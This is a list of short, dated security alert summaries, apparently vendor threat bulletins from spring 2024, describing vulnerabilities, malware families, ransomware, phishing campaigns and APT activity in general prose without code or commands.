8.4.24Old MS Office vulnerability CVE-2017-11882 still leveraged for Agent Tesla deliveryALERTSVULNEREBILITYCVE-2017-11882 is an older vulnerability affecting the Equation Editor component in Microsoft Office. Successful exploitation of this flaw might allow attackers for remote code execution on the infected machines. Agent Tesla is a malware family observed to be still leveraging this old vulnerability in some of the recent campaigns.
8.4.24Movable Type API CVE-2021-20837 vulnerability under active exploitationALERTSVULNEREBILITYCVE-2021-20837 is a critical (CVSS score 9.8) command injection vulnerability affecting Movable Type API. If successfully exploited, this vulnerability enables remote code execution.
8.4.24GuLoader campaign: From Seoul to BrusselsALERTSVIRUSGuLoader's prevalence remains unwavering, and Symantec continues to observe actors conducting campaigns worldwide. One particular case has caught our attention, as the actor exhibits behavior reminiscent of a locust colony, traversing from field to field. In fact, this actor has been orchestrating a substantial campaign in South Korea over the past three weeks in three waves, recently shifting focus to Belgium.
8.4.24Xray RansomwareALERTSRANSOMXray is yet another ransomware actor that has been observed in the threat landscape, targeting companies' servers and clients. Capability-wise, it's a generic ransomware that allows the actor to determine which folders to encrypt and which to skip. Upon successful encryption, files will be appended with a .Xray extension.
8.4.24New phishing run spoofs Mexican Postal Service (Correos de Mexico)ALERTSPHISHINGSymantec has observed a new wave of phish runs spoofing Mexican Postal Service (Correos de Mexico) to steal credentials. The email content is kept specific and mentions an undelivered package. The reason for not delivering the package is stated as "failure to pay custom duties".
8.4.24TA544 activities involving IDAT LoaderALERTSVIRUSA new set of malicious activities attributed to the TA544 (aka Narwal Spider) threat group has been reported in the wild. This threat actor has been known to target various Italian organizations and entities in the past. In their latest campaigns, the attackers have been leveraging new variants of the IDAT Loader malware to deliver various payloads such as Remcos RAT or SystemBC malware.
8.4.24JaskaGO infostealer for Windows and macOSALERTSVIRUSJaskaGO is a new Go-based infostealer developed for both Windows and macOS platforms. The malware collects a wide range of data from the compromised machines including credentials, cookies, browser history, files from local folders, cryptowallets and others. Collected data is compressed into a .zip archive and forwarded to attackers C2 servers. Beside the info-stealing functionality JaskaGO can also execute shell commands received from attackers as well as download and run additional payloads.
8.4.24Splunk Remote Code Execution (RCE) vulnerability CVE-2023-46214ALERTSVULNEREBILITYCVE-2023-46214 is a recently disclosed remote code execution (RCE) vulnerability affecting Splunk Enterprise platform. Due to a flaw in processing of user-supplied extensible stylesheet language transformations (XSLT), remote attackers might be able to upload malicious XSLT resulting in remote code execution on the affected Splunk instance.
8.4.24Zimbra Collaboration XSS vulnerability CVE-2023-37580ALERTSVULNEREBILITYCVE-2023-37580 is a recently disclosed 0-day (CVSS score: 6.1) Cross-Site Scripting vulnerability affecting Zimbra Collaboration suite. Successful exploitation of the vulnerability may allow an attacker to compromise the confidentiality and integrity of the target system by means of malicious scripts injection.
8.4.24Play Ransomware - latest attacks against enterprisesALERTSRANSOMSymantec Security Response is aware of the recent CISA, FBI and ASD's ACSC alert regarding a number of recent targeted activities observed for the Play (aka PlayCrypt) ransomware. Play ransomware has been discovered back in June 2022, and since that time it has been used in multiple high-profile attacks.
8.4.24"No One Was Home" themed Evri phishing emails are making the roundsALERTSPHISHINGEvri is a parcel delivery company based in United Kingdom. As the holiday season has started, spoofed emails masqueraded as Evri parcel notifications have been observed. These emails entice the users to click phishing URLs in order to reschedule the delivery as "no one was home". The phishing URLs are constructed using hijacked domains and with a sole purpose of stealing credentials.
8.4.24CVE-2023-49070 Apache OFBiz RCE vulnerabilityALERTSVULNEREBILITYCVE-2023-49070 is a critical (CVSS score 9.8) pre-auth remote code execution vulnerability in Apache OFBiz. Successful exploitation of the vulnerability grants the attacker complete control over the server, allowing them to steal sensitive data, disrupt operations, or even launch further attacks against the organization’s network. Symantec's network protection technology, Intrusion Prevention System (IPS) blocks these vulnerability exploitation attempts to prevent further infection/damage to the system.
8.4.24African based telecommunications organizations targeted by Iranian Seedworm groupALERTSAPTThe Symantec Threat Hunter Team, part of Broadcom, observed a recent campaign by the Seedworm threat actor group, targeting telecommunications organizations in North and East Africa. This activity, which occurred in November 2023, leveraged some new and some existing features previously attributed to Seedworm.
8.4.24Fake NordVPN Installer Delivering SecTopRATALERTSVIRUSWhile monitoring for new stealers, Symantec has observed an actor who has set up a Telegram channel for a stealer dubbed Vortex. After following breadcrumbs, it appears that there are ongoing test-related activities. This malware is pretty much the same as many stealers that abuse both Discord and Telegram to report to the actors and exfiltrate stolen information.
5.4.24New JsOutProx malware variant observed in campaigns targeted at financial sectorALERTSVIRUSA new JsOutProx malware variant has been observed in recent campaigns targeted at financial sector in the Africa, the Middle East, South Asia, and Southeast Asia. JsOutProx RAT is attributed to a threat group known as Solar Spider. While in the past the group has been using GitHub repositories to host the malicious payloads, the latest attacks leverage repositories on the GitLab platform instead.
5.4.24Byakugan malwareALERTSVIRUSByakugan is a modular infostealer variant observed recently in the wild. The malware has been distributed under the disguise of a Adobe Reader installer. The malware receives commands from a remote C2 server that also acts as attacker's control panel. Byakugan's functionality includes keylogging, screen capture, coin mining, theft of information stored in the web browsers and arbitrary file download, among others.
5.4.24Phorpiex malware campaign targets finance sector in Europe and North AmericaALERTSVIRUSA malware campaign distributing Phorpiex botnet has been observed targeting entities in the finance sector across Europe and North America. As part of the attack, shortcut files with embedded malicious macros are used to infect user systems and download additional malware payloads. Phorpiex can work without an active C2 server and is mainly used to steal cryptocurrency using the crypto-clipping technique.
5.4.24Indonesia – Wedding invites used as lure by an SMS thiefALERTSSPAMIn mid-2023, an actor have been observed sending SMS messages to mobile users in Indonesia, enticing them to install an application posing as a wedding invitation. Over the past few months, more of these malicious applications have been detected. The malware's primary goal is to collect SMS messages and send them to the author's Telegram channel via a Telegram bot API.
5.4.24Latrodectus malwareALERTSVIRUSLatrodectus loader is a malware variant first discovered in November 2023. The malware has been recently distributed in malicious campaigns attributed to the TA577 and TA578 threat groups. The loader is mostly used in the initial stages of the attacks to execute remote commands and to download additional payloads. Notably, its distribution campaigns exhibit similarities with previous IcedID operations in techniques and infrastructure usage.
5.4.24Backdoor code found in XZ Utils libraryALERTSVIRUSOn March 29th a security alert was issued warning users about malicious backdoor code embedded in certain versions of XZ Utils, a popular library of data compression tools that is present in nearly every Linux distribution. The malicious code, tracked as CVE-2024-3094, is embedded in XZ Utils versions 5.6.0 and 5.6.1. and could allow remote, malicious actors to break sshd authentication and gain unauthorized access to the entire impacted system.
5.4.24MacOS Users targeted with InfostealersALERTSVIRUSMacOS users continue to be targeted with infostealers via malicious advertisements and fake websites. In a recent campaign, a counterfeit website offering free group meeting scheduling software was observed. This website installs an infostealer capable of extracting users' keychain data, credentials stored in web browsers, and information from cryptocurrency wallets.
5.4.24TA588 continues espionage activities in Latin AmericaALERTSGROUPThe TA558 group, known for targeting various sectors across Latin America, has recently been observed employing spam emails with malicious attachments to distribute Venom RAT, a remote access trojan derived from Quasar RAT. This malware is equipped with functionalities for harvesting sensitive data and gaining remote control over compromised systems.
5.4.24YouTube Hijacking: Rise in Attack Campaigns Distributing InfostealersALERTSHACKINGAn increase in attack campaigns utilizing YouTube has been observed, with threat actors hijacking existing popular YouTube accounts to distribute Vidar and LummaC2 Infostealer malwares. Users are lured with videos purporting to offer cracked versions of everyday programs like Adobe. Links provided in the comments section lead to malicious packages uploaded to MediaFire. Consequently, users unwittingly become infected by downloading and executing malicious code instead of the desired program.
3.4.24Napoli RansomwareALERTSRANSOMNapoli, a variant of Chaos ransomware, has recently been discovered in the wild. The malware encrypts user files, adds the .napoli extension and also changes the desktop wallpaper on the infected endpoints.
3.4.24Emergence of new Vultur banking trojan variant in mobile threat landscapeALERTSVIRUSA newer version of the Vultur banking trojan for Android has been observed in the wild. This version features enhanced evasion techniques and advanced remote control capabilities. In the recent campaign, victims are lured into installing a trojanized version of a security app via a link sent through SMS, along with instructions provided via a phone call.
3.4.24Indonesian Businesses Targeted in an Agent Tesla CampaignALERTSVIRUSSymantec has recently observed an individual or group running a targeted malspam campaign against Indonesian organizations, although instances have been seen in neighboring countries.
30.3.24CVE-2024-20767 - Adobe ColdFusion vulnerabilityALERTSVULNEREBILITYCVE-2024-20767 is a directory traversal vulnerability in Adobe ColdFusion, which is a development platform for building and deploying web and mobile applications. If successfully exploited, this vulnerability allows unauthenticated remote attackers to read arbitrary files on the system. Symantec's network protection technology, Intrusion Prevention System (IPS) blocks these vulnerability exploitation attempts to prevent further infection/damage to the system.
30.3.24Sync-Scheduler InfostealerALERTSVIRUSA Infostealer dubbed as Sync-Scheduler, written in C++, has been reported as being distributed concealed within Office document files. The malware employs file-nesting techniques to conceal its presence and is equipped with anti-analysis and defense evasion techniques. Upon compromising systems, it searches through users' personal directories for office documents such as Word, PowerPoint, and Excel files.
30.3.24WarzoneRAT malware re-emerges with new samplesALERTSVIRUSWarzoneRAT (also known as AveMaria) is a commodity Remote Access Trojan variant used by various threat groups in recent years. The malware functionality allows for remote control, remote shell and file operations, credential theft, keylogging, UAC bypass and more. Back in February 2024 the FBI dismantled the Warzone RAT malware operation and seized the infrastructure associated to this threat.
30.3.24TheMoon malware targets thousands of insecure routersALERTSVIRUSA new malicious campaign featuring an updated version of TheMoon, a notorious malware family has been reported. This latest variant of TheMoon appears to target insecure outdated home routers, particularly those manufactured by Asus, along with other IoT devices. After compromising these devices, the malware utilizes them to route traffic through a proxy service known as Faceless.
30.3.24Beware of FlightNightALERTSVIRUSA new threat actor has been observed using similar Tactics, Techniques and Procedures (TTPs) to recent Go-Stealer campaigns targeting Indian government entities. Named FlightNight because of its use of Slack channels named "FlightNight" it is likely the work of the same threat actor.
28.3.24Dropper disguised as legitimate PuTTy SoftwareALERTSVIRUSA threat actor has been reported purchasing an ad claiming to be the PuTTY homepage. This ad appeared at the top of the Google search results page, although it has since been removed. It appeared just before the official PuTTY website. This ad raised suspicion due to the domain name, which was unrelated to PuTTY. The PuTTY file advertised in the ad was actually malware, serving as a dropper written in the Go language. Upon execution, the dropper delivered the final payload, known as Rhadamanthys.
28.3.24Mispadu Stealer extends its reachALERTSVIRUSMispadu Stealer (known also as Ursa) has shown some increased activity in recent distribution campaigns. While originally this malware has been mostly targeting LATAM countries, the recently observed activity shows European countries to be targeted this time around as well. The malware delivery chain leverages .pdf documents containing URL links to .zip archive with malicious MSI installers or HTA scripts. Later stages include deployment of malicious VB Scripts and the Mispadu malware payloads. 
28.3.24Qilin ransomware remains an active threat in the landscapeALERTSRANSOMQilin, also known as Agenda, is a Rust-based ransomware variant discovered in 2022. The malware has been spreading actively in the wild in recent months, with ongoing developments evident in new versions. Qilin is known to be distributed under a Ransomware-as-a-Service (RaaS) model with its operators often employing double extortion tactics. Most recent campaigns utilise custom PowerShell scripts to target vCenter and ESXi instances.
28.3.24SnowLight downloader spread in campaigns exploiting F5 BIG-IP and ScreenConnect vulnerabilitiesALERTSVIRUSRecent malicious campaigns attributed to the UNC5174 threat group have been reported to exploit F5 BIG-IP (CVE-2023-46747) and Connectwise ScreenConnect (CVE-2024-1709) vulnerabilities for malware delivery. One malware variant, SnowLight, is a C-based downloader for Linux, used by the threat actors to download and execute secondary payloads on the infected machines. GoreVerse, GoHeavy and SuperShell are payload variants distributed by UNC5174 in the reported campaigns.
27.3.24Stately Taurus APT Campaign Targeting Asian CountriesALERTSAPTResearchers observed a recent Stately Taurus (aka Mustang Panda) APT campaign during an ASEAN-Australia Special Summit held just this month targeting Asian countries. Two malware packages were created and deployed for this recent attack - one is a ZIP format and the other one is a SCR file. Both of these packages' main goal is to deploy malware with the use of abused copies of applications from known software developers like QFX Sofware Corporation and Electronic Arts, Inc..
27.3.24VCURMS and STRRAT being delivered via links in spam messagesALERTSVIRUSA java downloader has been discovered delivering VCURMS and STRRAT remote access trojans. This downloader is deployed via email with links to malicious JAR files. These two RATs will then download a modified Rude Stealer and keylogger for data exfiltration.
26.3.24VCURMS and STRAT being delivered via links in spam messagesALERTSVIRUSA java downloader has been discovered delivering VCURMS and STRRAT remote access trojans. This downloader is deployed via email with links to malicious JAR files. These two RATs will then download a modified Rude Stealer and keylogger for data exfiltration.
26.3.24VCURMS and STRRAT being delivered via links in spam messagesALERTSVIRUSA java downloader has been discovered delivering VCURMS and STRRAT remote access trojans. This downloader is deployed via email with links to malicious JAR files. These two RATs will then download a modified Rude Stealer and keylogger for data exfiltration.
26.3.24New backdoor WineLoaderALERTSVIRUSPhishing attacks impersonating political parties with an invite lure to diplomats for a wine-tasting event has been used to deploy WineLoader malware. WineLoader is a new backdoor variant that shares features similar to that of BurntBatter, BeatDrop, and MuskyBeat which are associated with APT29. Once deployed, WineLoader collects and exfiltrates gathered information from the infected machine (victim's username, process name, device name etc.) to the C2. The C2 can determine to execute additional modules to perform further tasks like establishing persistence.
26.3.24New remote control backdoor leveraging malicious drivers emerges in ChinaALERTSVIRUSIn a recent campaign observed in China, a new remote control backdoor was distributed. The threat actors behind the campaign utilized malicious kernel-mode drivers to carry out exploitation activities. The backdoor exhibited various capabilities, including disabling anti-virus software, stealing keyboard inputs, and downloading additional malware files such as miners and rootkits from command-and-control (C2) servers for execution. This campaign underscores the expectation that threat actors will continue to utilize rootkits to conceal malicious code from security tools, thereby weakening defenses and evading detection for extended periods of time.
26.3.24Emergence of Mirai Nomi in the Threat LandscapeALERTSBOTNETA new Mirai botnet variant, named Mirai Nomi, has emerged in the threat landscape. This variant features modified UPX packing, a time-dependent Domain Generation Algorithm (DGA) for command and control, and multiple encryption and hashing algorithms. It includes capabilities such as file deletion, process termination, persistence and elimination of competing bots. Although not very active, its capabilities raise concerns about potential future threats.